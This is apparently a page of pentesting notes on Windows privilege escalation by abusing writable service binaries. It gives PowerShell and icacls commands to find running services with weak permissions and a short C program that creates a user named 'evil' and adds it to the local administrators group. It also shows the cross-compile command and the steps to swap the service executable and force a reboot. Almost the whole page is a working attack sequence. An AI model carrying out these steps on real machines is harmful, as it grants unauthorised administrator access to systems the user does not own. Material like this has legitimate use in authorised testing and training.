Insecure File permission

Good vector

Powershell 
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

icacls "C:\Program Files\test\bin\test.exe" # Path of the service\
Get-Acl C:\xampp\htdocs\logs | fl # Same as icacls but better

Check to see if this application has BUILTIN\USERS permission. If yes, Boom - Jackpot!
# Get msfvenom and replace that file with the move command
# Craft the Attack, ON KALI

adduser.c



#include <stdlib.h>

int main ()
{
  int i;
  
  i = system ("net user evil password123 /add");
  i = system ("net localgroup administrators evil /add");
  
  return 0;
}

# Compile the code and transfer the binary to the Victim.
i686-w64-mingw32-gcc adduser.c -o adduser.exe

# Replace the service with our malicious binary on Victim.
move "C:\Program Files\test\bin\test.exe" "C:\Program Files\test\bin\test.exe"
move adduser.exe "C:\Program Files\test\bin\test.exe"
dir "C:\Program Files\test\bin\"

# Restart the service
wmic service where caption='test' get name, caption, state, startmode
shutdown /r /t 0
net localgroup Administrators

PreviousAlwaysInstallElevated NextWindows Subsystem

Last updated 2 years ago

hashtagadduser.c

adduser.c